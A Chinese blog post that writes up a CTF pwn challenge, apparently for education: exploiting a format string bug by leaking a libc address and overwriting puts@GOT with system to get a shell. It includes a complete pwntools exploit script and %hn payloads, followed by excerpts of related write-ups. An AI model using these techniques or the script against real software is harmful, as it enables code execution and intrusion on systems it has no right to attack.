CTF-PWN-printf(实验吧|格式化字符漏洞)

最新推荐文章于 2025-08-12 21:25:25 发布
原创 最新推荐文章于 2025-08-12 21:25:25 发布 · 3.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何在存在格式化字符漏洞的程序中,通过逆向工程找到正确的输入,利用该漏洞控制内存读写,进而构造system(/bin/sh)命令获取shell的过程。文章深入分析了漏洞原理,展示了如何计算system函数地址并覆盖到puts函数,最终实现远程代码执行。

首先运行文件,发现需要输入name,于是打开ida逆向出正确的name,来到了程序主界面。

首先我们先逐一判断函数的用途。put_file是让我们输入文本名称和内容,get_file是让我们输入文本名称,然后程序输出文本内容。show_dir是按照先来后出输出所有的文本名称,并且无缝衔接。

这个时候我们发现get_file函数中显然有一个格式化字符漏洞。

这种漏洞会导致我们可以控制任意内存的读写,因此我们考虑由此下手,构造system(/bin/sh)拿到shell

由于show_dir为反向输出,并且中间没有分隔符号,所以我们对输入的文件名下手,构造/bin/sh,那么自然,我们就可以劫持puts函数为system函数

然而程序本身没有system函数的入口,所以我们要找到一种办法将GOT中system函数的地址覆盖到puts函数中

在Linux终端,通过输入:

readelf -r pwn

我们可以查看到puts在运行的时候实际地址被存放到的地址

所以我们下一步就是找到system的实际地址,然后利用格式化字符漏洞,将其写入0x804a028中 

 这里参考了一下leehaming的博客https://blog.youkuaiyun.com/lee_ham/article/details/82556622,利用以下公式,可以算出system在运行时的实际地址

libc_base = __libc_start_main_addr - __libc_start_main_offset

system_addr = libc_base + system_offset

用gdb-peda在printf函数处下断点,检查栈。(命令为 stack 100)

 

我们发现了__libc_start_main+247为0xffffd03c,又因为栈顶位置与0xffffd03c距离为364,364/4=91,所以我们可以直接输入%91$x来表示,于是__libc_start_main就可以求出来了

通过libc-database可以知道system函数相关的偏移值,然后system函数的地址我们也可以求出

接下来就是将地址写入puts的临时地址位置中。

为了加快速度,我们可以考虑将system的地址(假设为0xaabbccdd)分成两部分,低地址放进 0x804a028,高地址放进0x804a02a。

构造payload

payload1 = p32(puts_got_addr) + '%%%dc' % ((system_addr & 0xffff)-4) + '%7$hn'
payload2 = p32(puts_got_addr+2) + '%%%dc' % ((system_addr>>16 & 0xffff)-4) + '%7$hn'
之所以是%7$hn,是因为我们在程序停止于printf函数时,打印栈发现我们需要改变的地方的偏移量为7。

exp程序:

from pwn import *
context.log_level = 'debug'

#prog = remote('106.2.25.7',8001)
prog=process("./pwn")

def putfile( prog , filename , content ) :
   print 'putting ' , content 
   prog.sendline('put')
   prog.recvuntil(':')
   prog.sendline(filename)
   prog.recvuntil(':')
   prog.sendline(content)
   prog.recvuntil('ftp>')
def getfile(prog , filename ) :
   prog.sendline('get')
   prog.recvuntil(':')
   prog.sendline(filename)
   return prog.recv(2048)

prog.recv(2048)
prog.sendline('rxraclhm')
prog.recv(2048)
putfile(prog,'sh;','%91$x')
res = getfile( prog , 'sh;')
print res
mainadd = int(res[:8], 16)-247
sysadd = mainadd - 0x18540 + 0x3ada0 
print 'system addr ' , hex(sysadd)
putsadd = 0x0804a028

payload1 = p32(putsadd) + '%%%dc' % ((sysadd & 0xffff)-4) + '%7$hn'
putfile(prog , 'in/' , payload1)
getfile(prog , 'in/')
prog.recvuntil('ftp>')

payload2 = p32(putsadd+2) + '%%%dc' % ((sysadd>>16 & 0xffff)-4) + '%7$hn'
putfile(prog, '/b' , payload2)
getfile(prog,'/b')
prog.recvuntil('ftp>')
prog.sendline('dir')
prog.interactive()

 

栈溢出攻击c语言_从0开始CTFPWN(四)ROP绕过栈可执行保护与GOT表劫持
weixin_30219823的博客
01-04 855
本文为看雪论优秀文章看雪论坛作者ID:dxbaicai一、教程说明1.1 历史回顾第一节我们介绍了基础环境准备:从0开始CTF-PWN()——基础环境准备第二节我们介绍了栈溢出的入门:从0开始CTF-PWN()PWN的HelloWorld-栈溢出开始第三节我们介绍了自行构造shellcode:从0开始CTF-PWN()没有system怎么办?构造你的shellcode1.2 本节...
CTF权威指南 笔记 -第二章二进制文件- 2.4 -动态链接
m0_64180167的博客
05-04 956
随着可执行文件的增加 静态链接带来的浪费空间问题就会愈发严重 如果大部分可执行文件都需要glibc 那么在链接的时候就需要把 libc.a链接进去如果一个libc.a为5M 那么100就是 5G 例如下面的左边 动态链接 如果不把系统库和自己编写的代码链接到一个可执行文件 而是分割到两个独立的模块 等到程序进行运行了 再进行链接 这样就可以节省硬盘空间 并且在内存中一个系统库可以被多个程序使用 这样还会节省物理空间 例如上图的右边 继续使用之前静态链接的例子这里我们把func.c编译为
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 782
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
BugkuCTF-PWNpwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1435
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
CTF-PWN笔记(二)-- 格式化字符漏洞
CK_0ff的博客
01-27 1758
文章目录漏洞介绍格式化字符串的格式漏洞原理及利用例题 漏洞介绍 格式化字符串(英语:format string)是一些程序设计语言的输入/输出库中能将字符串参数转换为另一种形式输出的函数。例如C、C++等程序设计语言的printf类函数,其中的转换说明(conversion specification)用于把随后对应的0个或多个函数参数转换为相应的格式输出;格式化字符串中转换说明以外的其它字符原样输出。 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。 通俗来
[CTF]PWN--手搓格式化字符漏洞
2301_79880752的博客
02-19 1716
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个栈地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于栈里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
跟着CTF-Wiki学pwn|格式化字符(1)
Kni9hT's Blog
05-19 2429
文章目录格式化字符漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符漏洞原理格式化字符漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符漏洞原理介绍 首先,对格式化字符漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
BUUCTF-PWN刷题记录-18(格式化字符漏洞
weixin_44145820的博客
05-08 2080
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
CTFshow-pwn入门-pwn93深入理解格式化字符
Claire_cat的学习记录
08-12 425
崩溃发生在 strlen函数内部(__strlen_avx2是 glibc 的优化版 strlen),strlen被调用是因为 printf遇到 %s时,会尝试读取栈上的一个地址并计算其长度,当 printf尝试用这些无效地址调用 strlen时,触发 Segmentation Fault。在 64 位程序函数调用约定中,参数分别放在 rdi、rsi、rdx、rcx、r8、r9 寄存器上,多余的压在栈上。这道题一定要花费大量的时间去调试,理解格式化字符串的原理。64 位小端序,保护全开,ida 反编译。
pwn学习笔记(5)--格式化字符漏洞(未完全完成)
qq_66013948的博客
03-05 1787
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
Pwn】05.Linux-User Mode-格式化字符
weixin_52553215的博客
03-10 1340
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
pwn入门笔记(3)——printf漏洞调试
weixin_45551695的博客
07-28 986
printf 在C语言中,我们经常使用各种函数来进行输出操作 printf,fprintf,vprintf,vfprintf,sprint等, 其中Fomat String是其第一个参数,我们一般称之为格式化字符printf 接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定格式的子字符串进行对应,将格式化字符串中的特定子串,解析为相应的参数值。 解析 我们都知道printf在执行的时候,首先进行格式化字符串的解析,,从栈或者寄存器中获取参数并与符号说明相匹配,然
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 716
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
[PWN][基础篇]printf漏洞介绍
网络安全知识分享
03-20 5417
printf漏洞介绍1、概念2、漏洞成因 1、概念 printf接受变长的参数,其中第一个参数为格式化字符串,后面的参数在实际运行时将与格式化字符串中特定的子字符串进行对应,将格式化字符串中的特定字串,解析为相应的参与值。格式化字符串就是%这种。 2、漏洞成因 printf函数在执行时,首先进行格式化字符串的解析–从栈(或者寄存器)获取参数并与符号说明进行匹配,然后将匹配的结果输出到屏幕上,那么 ,如果格式化字符串中的符号声明与栈上参数不能正确匹配,比如参数个数少于符号声明个数时,就会造成泄漏。 而本书,p
pwn学习资料整理——x64中的printf回显漏洞
recover517的博客
08-04 489
利用printf打印栈中内容 B站上有讲解有关printf回显栈数据的课程,但都是以x86为例,这次做题遇到x64架构下的相关漏洞,故做本次记录。 IDA伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[32]; // [rsp+0h] [rbp-30h] BYREF char buf[16]; // [rsp+20h] [rbp-10h] BYREF setvbuf(stdin, 0L
利用printf调用malloc getshell&&0ctf2017_easiestprintf
azraelxuemo的博客
04-03 1213
文章目录0ctf2017_easiestprintf题目分析保护源码do_readleave攻击泄露libc如何劫持控制流printf源码分析小结开始利用__free_hook替换成gadget__malloc_hook换成one_gagdet最后一种解法 首先题目名字严重…漏洞看上去很简单,但真的好难 0ctf2017_easiestprintf 0ctf2017_easiestprintf 题目分析 最难的题目往往代码很简单 保护 RELRO 全开,也就是不能修改fini,init,got表来劫持控制流
hctf[pwn]babyprintf_ver2
九层台
11-15 940
0x01程序分析 程序给出了data段的地址,然后允许向这个地址处输入0x1ff个字节。 这个data段到底存的是什么呢? pwndbg> print $rbx + $rax $1 = 0x555555756011 pwndbg> x /50xg 0x555555756011 0x555555756011: 0x7200676664647364 0x200000000000646c ...
printf 一次性写
weixin_52640415的博客
06-03 827
printf 无偏移参数直接一次性写指针和值
[pwn]关于printf输出时机的坑
Breeze的博客
08-26 8457
关于printf输出时机的坑 今天遇到了一个特别有意思的题,本来很简单的利用,但一直没有算出来,最后发现是一个很简单的却很细节的问题。 welpwn详细writeup 题目地址:welpwn 首先查看一下安全策略: 保护很少,然后看一下代码逻辑: read读入了0x400个字节,一般这么长必有溢出,注意echo并不是系统函数,查看echo逻辑: s2只有16个字节,但却复制了一个0x400字...
[CTF]PWN--非栈上格式化字符漏洞
最新发布
08-14
### 非栈上格式化字符漏洞概述 在CTF比赛的PWN类别中,格式化字符漏洞是一种常见的安全漏洞,通常出现在使用不安全的格式化函数(如`printf`、`sprintf`等)时。如果程序允许用户直接控制格式化字符串参数,而未进行适当的验证和过滤,则可能导致攻击者利用该漏洞读取或写入内存数据。 在栈上的格式化字符漏洞利用较为常见,而非栈上格式化字符漏洞则涉及对堆内存或其他非栈内存区域的利用。这类漏洞通常更具挑战性,但也提供了更多的攻击面。 ### 利用方法 非栈上格式化字符漏洞的利用主要依赖于对格式化字符串中特殊格式符的使用,尤其是`%n`。`%n`的作用是将当前已经输出的字符数写入指定的指针位置。通过精心构造格式化字符串,攻击者可以实现任意地址写入(Arbitrary Write)。 在非栈上场景中,通常需要找到一个可以控制的指针,指向堆内存或其他可写区域。例如,攻击者可以通过泄露堆地址,然后利用`%n`将数据写入堆中的特定位置。这种方法常用于覆盖函数指针或全局偏移表(GOT)中的条目,从而实现控制流劫持。 ```c // 示例代码,展示不安全的格式化字符串使用 #include <stdio.h> void vulnerable_function(char *user_input) { printf(user_input); // 不安全的格式化字符串使用 } int main(int argc, char **argv) { if (argc > 1) { vulnerable_function(argv[1]); } return 0; } ``` 在上述示例中,如果攻击者能够控制`user_input`的内容,则可以构造特定的格式化字符串来触发漏洞。例如,攻击者可以输入类似`%x%x%x%n`的字符串,试图读取栈上的数据并写入特定地址。 ### 防御方法 为了防止非栈上格式化字符漏洞的利用,可以采取以下几种防御措施: 1. **避免使用不安全的格式化函数**:尽量使用带有显式参数的格式化函数,如`fprintf`、`snprintf`等,并确保格式字符串是静态常量,而不是用户可控的输入。 2. **输入验证和过滤**:对用户输入进行严格的验证和过滤,确保输入中不包含任何格式化字符(如`%`)。可以通过白名单机制来限制输入内容。 3. **地址空间布局随机化(ASLR)**:启用ASLR可以增加攻击者预测内存地址的难度,从而降低漏洞利用的成功率。 4. **堆内存保护**:使用现代编译器提供的堆内存保护机制,如堆栈保护(Stack Canaries)、地址随机化等,以增加攻击者利用堆漏洞的难度。 5. **代码审计和静态分析**:定期进行代码审计和静态分析,查找并修复潜在的安全漏洞。使用静态分析工具可以帮助识别不安全的格式化字符串使用。 6. **运行时检测**:在程序运行时检测格式化字符串的使用情况,及时发现并阻止异常行为。 ### 示例:修复不安全的格式化字符串使用 ```c // 修复后的代码,使用安全的格式化字符串使用方式 #include <stdio.h> void safe_function(char *user_input) { printf("%s", user_input); // 使用安全的方式处理用户输入 } int main(int argc, char **argv) { if (argc > 1) { safe_function(argv[1]); } return 0; } ``` 在修复后的代码中,通过使用`%s`格式化符并显式传递用户输入,避免了用户输入直接作为格式化字符串的风险。 ### 总结 非栈上格式化字符漏洞的利用虽然较为复杂,但通过精心构造的格式化字符串和内存操作,攻击者仍然可以实现严重的攻击效果。因此,在开发过程中,必须采取有效的防御措施,确保程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值